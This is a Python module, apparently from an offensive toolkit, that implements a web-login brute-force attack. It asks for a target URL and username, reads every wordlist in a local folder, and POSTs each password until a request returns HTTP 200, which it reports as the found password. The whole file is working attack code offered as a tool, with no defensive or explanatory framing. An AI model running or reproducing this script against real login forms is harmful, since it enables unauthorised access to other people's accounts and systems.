import os
import time

import requests

from attacks import Attack
from consts import *
from utils import print_msg


class BruteForceWeb(Attack):
    def name(self):
        return "brute-force (web)"

    def deps(self):
        return GRE

    def run(self):
        url = input(f"{YEL}url:{NOC} ")

        username = input(f"{YEL}username to try:{NOC} ")

        words: list[str] = []
        wordlists_path = f"{SCRDIR}/wordlists"
        wordlists = os.listdir(path=wordlists_path)
        for file in wordlists:
            with open(f"{wordlists_path}/{file}", "r") as wordlist:
                print(f"{YEL}reading from:{NOC} {file}")
                words.extend(list(filter(None, wordlist.read().splitlines())))
        if not words:
            print_msg(f"{RED}no wordlists found. add some to '{wordlists_path}'.")
            time.sleep(1)
        try:
            for password in words:
                print(
                    f"\r{YEL}trying password:{NOC} {password}",
                    end="\x1b[1K",
                )
                r = requests.post(
                    url, data={"username": f"{username}", "password": f"{password}"}
                )
                if r.status_code == 200:
                    print_msg(f"\r{GRE}found password:{NOC} {password}")
                    return
            print_msg(f"\r{RED}no password found{NOC}")
        except requests.exceptions.MissingSchema:
            print_msg(f"{RED}invalid url:{NOC} {url}")
        except requests.exceptions.ConnectionError:
            print_msg(f"{RED}connection error. couldn't reach {NOC}{url}{RED}.{NOC}")
        except:
            print_msg(MISSINGDEPS)
